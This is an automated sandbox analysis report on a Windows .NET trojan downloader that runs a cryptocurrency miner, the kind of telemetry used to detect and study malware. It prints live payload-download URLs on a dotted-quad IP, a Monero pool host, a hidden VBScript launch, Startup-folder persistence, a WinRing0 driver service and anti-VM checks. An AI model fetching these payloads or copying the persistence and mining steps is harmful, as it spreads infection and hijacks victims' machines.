Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 4, 2021, 11:03 a.m.	July 4, 2021, 11:09 a.m.

Size	29.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`c67b1ffb63818072eb4cc935b3f51ed5`
SHA256	`c4a2ff17b64e24fbf00d70d2d4b996332cb7a4767f2c27e6a2ff93999cc44e67`
CRC32	`63980C7C`
ssdeep	`384:0f0vg/2nD/VrQirfuA0OQx61zxaJ3ImPmV24gmBtRdt5ApMZptYcFmVc03K:01+DVr17+0EPmVGm/l6pMTtYcFmVc6K`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

msiexec.exe "C:\Users\test22\AppData\Local\Temp\msiexec.exe"
5032
- tmpE6BAtmp.exe "C:\Users\test22\AppData\Local\Temp\tmpE6BAtmp.exe"
  6472
  - notepad.exe "C:\Windows\notepad.exe" -c "C:\ProgramData\LKBNMTFJgl\cfgi"
    7112
  - cmd.exe cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
    2648
    - wscript.exe WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
      7908

Name	Response	Post-Analysis Lookup
xmr-us-east1.nanopool.org	A 144.217.14.109 A 142.44.243.6 A 192.99.69.170 A 144.217.14.139 A 142.44.242.100	144.217.14.109

IP Address	Status	Action
142.44.243.6	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
45.144.225.135	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49809 -> 45.144.225.135:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.102:49809 -> 45.144.225.135:80	2016702	ET HUNTING Suspicious csrss.exe in URI	Potentially Bad Traffic
TCP 45.144.225.135:80 -> 192.168.56.102:49809	2014819	ET INFO Packed Executable Download	Misc activity
TCP 45.144.225.135:80 -> 192.168.56.102:49809	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.144.225.135:80 -> 192.168.56.102:49809	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.144.225.135:80 -> 192.168.56.102:49809	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49811 -> 45.144.225.135:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 45.144.225.135:80 -> 192.168.56.102:49811	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.144.225.135:80 -> 192.168.56.102:49811	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49814 -> 142.44.243.6:14444	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 4, 2021, 10:55 a.m.			0	0
IsDebuggerPresent July 4, 2021, 10:55 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 4, 2021, 10:55 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.144.225.135/csrss.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.144.225.135/config.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://45.144.225.135/notepad.exe

Performs some HTTP requests (3 events)

request	GET http://45.144.225.135/csrss.exe
request	GET http://45.144.225.135/config.txt
request	GET http://45.144.225.135/notepad.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 99 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3d33000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef292a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1f55000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2291000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef292b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001fd0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2294000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bf6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1d36000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdddd000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:55 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef7aa0000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b6d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef7da6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 4, 2021, 10:56 a.m.	process_identifier: 5032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef7d51000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\tmpE6BAtmp.exe

Creates a suspicious process (1 event)

cmdline

cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 4, 2021, 11:04 a.m.	thread_identifier: 3968 thread_handle: 0x000000c8 process_identifier: 2648 current_directory: filepath: track: 1 command_line: cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000130	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (16 events)

Time & API	Arguments	Status	Return
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: pw.exe process_identifier: 2596	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 1480	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: msiexec.exe process_identifier: 5032	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: tmpE6BAtmp.exe process_identifier: 6472	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: 犚 process_identifier: 7413312		0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: notepad.exe process_identifier: 7112	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: cmd.exe process_identifier: 4608	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: conhost.exe process_identifier: 8772	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: pw.exe process_identifier: 7552	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x0000027c process_name: cmd.exe process_identifier: 4744	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x0000027c process_name: conhost.exe process_identifier: 6440	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x0000027c process_name: pw.exe process_identifier: 2424	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: cmd.exe process_identifier: 6948	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: conhost.exe process_identifier: 6652	1	1
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: pw.exe process_identifier: 1432	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 4, 2021, 10:56 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process tmpe6batmp.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 4, 2021, 11:04 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELexA®à0 0Î¤ À @ !@¤ KÀ T,! H.textÔ `.rsrcT,À . @@.reloc!¶ @B°¤ H\K,Goç ***( ( ^( 8(8(0d8TþE8%{9+ ~P9Øÿÿÿ& 8Íÿÿÿ{(8( 8óÿÿÿ9îÿÿÿ8³ÿÿÿ0 8\þE§ÞôXËaM®â²Y(@ç¸w.Kýâ+r8¢{o 8v{rp(8(! ~:>ÿÿÿ&84ÿÿÿ{(8J{ request_handle: 0x00cc000c	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (19 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: pw.exe process_identifier: 3320		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x000000c8 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000280 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000280 process_name: pw.exe process_identifier: 2424		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: taskhost.exe process_identifier: 6980		0	0
Process32NextW July 4, 2021, 11:04 a.m.	snapshot_handle: 0x00000258 process_name: pw.exe process_identifier: 1432		0	0
Process32NextW July 4, 2021, 11:05 a.m.	snapshot_handle: 0x0000027c process_name: taskhost.exe process_identifier: 6980		0	0

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	45.144.225.135

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW July 4, 2021, 10:57 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Windows\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Windows\WinRing0x64.sys desired_access: 983551 service_handle: 0x0000000000be7c80 error_control: 1 service_type: 1 service_manager_handle: 0x0000000000be7c50	1	12483712	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.Autoruns.GenericKDS.46569954
FireEye	Trojan.Autoruns.GenericKDS.46569954
McAfee	RDN/Generic Downloader.x
Cylance	Unsafe
Sangfor	Riskware.Win32.Agent.ky
BitDefenderTheta	Gen:NN.ZemsilF.34790.bm0@aiEmJbg
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.IEV
APEX	Malicious
Kaspersky	HEUR:Trojan.MSIL.BitCoinMiner.gen
BitDefender	Trojan.Autoruns.GenericKDS.46569954
Ad-Aware	Trojan.Autoruns.GenericKDS.46569954
Emsisoft	Trojan.Autoruns.GenericKDS.46569954 (B)
McAfee-GW-Edition	Artemis!Trojan
SentinelOne	Static AI - Malicious PE
Avira	SPR/mIRC.Gen
MAX	malware (ai score=83)
Microsoft	Trojan:Win32/Wacatac.B!ml
GData	Trojan.Autoruns.GenericKDS.46569954
Cynet	Malicious (score: 100)
Tencent	Msil.Trojan-downloader.Agent.Syhv

msiexec.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All